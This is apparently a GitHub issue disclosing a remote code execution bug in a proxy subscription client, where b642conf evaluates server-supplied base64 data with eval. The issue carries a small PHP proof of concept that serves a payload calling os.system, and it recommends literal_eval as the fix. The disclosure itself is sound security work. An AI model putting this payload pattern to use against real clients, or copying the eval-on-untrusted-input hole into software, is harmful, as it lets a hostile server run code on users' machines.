Closed TomAPU closed 4 years ago
The vulnerability is in function b642conf at sub2conf_api.py(line 45) In this function,to convert a string to a dict,the author used function eval to do so.
def b642conf(self, prot, tp, b64str): if prot == "vmess": ret = eval(parse.unquote(base64.b64decode(b64str).decode())) region = ret['ps']
However this function is UNSAFE,any one who controls the b64str string can execute any python code he/she wants in your machine When user clicks the button 更新订阅 (update subscribing),the client will send an HTTP request to subscribing server for subscribing data. A malicious subscribing server can send a crafted HTTP response to client to execute arbitary python code on client's machine! Any one who controls the data,from the server owner,MITM attacker,hackers who control the server can execute any code in client's machine
POC CODE
<?php //move the file into /var/www/html/index.php and launch your apache service. set the subscribing server as http://127.0.0.1/ and click the button $shellcode="__import__('os').system('gedit')"; $payload="vmess://"; $payload.=base64_encode($shellcode); $payload.="\n"; $payload=base64_encode($payload); echo $payload; ?>
POC EXPLOITED RESULT: FIX SUGGESTION: use literal_eval instead of eval. literal_eval can do the same thing(convert string to dict) safely
Thank you for your issue, the next update will solve this problem, thank you
The vulnerability is in function b642conf at sub2conf_api.py(line 45) In this function,to convert a string to a dict,the author used function eval to do so.
However this function is UNSAFE,any one who controls the b64str string can execute any python code he/she wants in your machine When user clicks the button 更新订阅 (update subscribing),the client will send an HTTP request to subscribing server for subscribing data. A malicious subscribing server can send a crafted HTTP response to client to execute arbitary python code on client's machine! Any one who controls the data,from the server owner,MITM attacker,hackers who control the server can execute any code in client's machine
POC CODE
POC EXPLOITED RESULT: FIX SUGGESTION: use literal_eval instead of eval. literal_eval can do the same thing(convert string to dict) safely